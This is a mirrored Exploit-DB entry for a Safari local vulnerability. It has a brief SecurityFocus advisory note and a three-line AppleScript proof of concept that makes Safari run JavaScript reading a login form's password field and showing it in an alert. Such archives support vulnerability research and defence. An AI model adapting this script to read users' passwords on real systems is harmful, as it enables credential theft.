exploit-db-mirror/platforms/osx/local/29950.js
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

9 lines
340 B
JavaScript
Executable file

source: http://www.securityfocus.com/bid/23825/info
Apple Safari is prone to an unspecified local vulnerability.
Few technical details are currently available. We will update this BID as more information emerges.
tell application "Safari"
do JavaScript "alert(document.loginform.password.value)" in document 1
end tell